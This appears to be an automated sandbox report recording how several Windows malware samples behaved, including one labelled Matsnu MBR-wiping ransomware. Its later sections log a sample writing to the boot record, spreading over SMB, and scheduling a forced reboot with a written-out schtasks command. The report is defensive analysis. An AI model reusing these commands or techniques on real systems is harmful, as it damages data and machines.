memory/4808-0-0x0000000000940000-0x0000000000944000-memory.dmp
memory/4808-1-0x0000000000940000-0x0000000000944000-memory.dmp
memory/4808-2-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-4-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-6-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-8-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-11-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-13-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/4808-15-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\131.exe
"C:\Users\Admin\AppData\Local\Temp\131.exe"
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\131.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\131.exe
"C:\Users\Admin\AppData\Local\Temp\131.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
137s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3544 -ip 3544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 368
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\A016.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
C:\Users\Admin\AppData\Local\Temp\A016.tmp
"C:\Users\Admin\AppData\Local\Temp\A016.tmp" \\.\pipe\{910001EC-46A2-4968-BD24-177A95D7E1E6}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/2532-0-0x0000000000250000-0x00000000002AE000-memory.dmp
memory/2532-8-0x0000000000250000-0x00000000002AE000-memory.dmp
memory/2532-9-0x0000000000250000-0x00000000002AE000-memory.dmp
memory/2532-11-0x0000000000250000-0x00000000002AE000-memory.dmp
\Users\Admin\AppData\Local\Temp\A016.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/2532-26-0x0000000000250000-0x00000000002AE000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
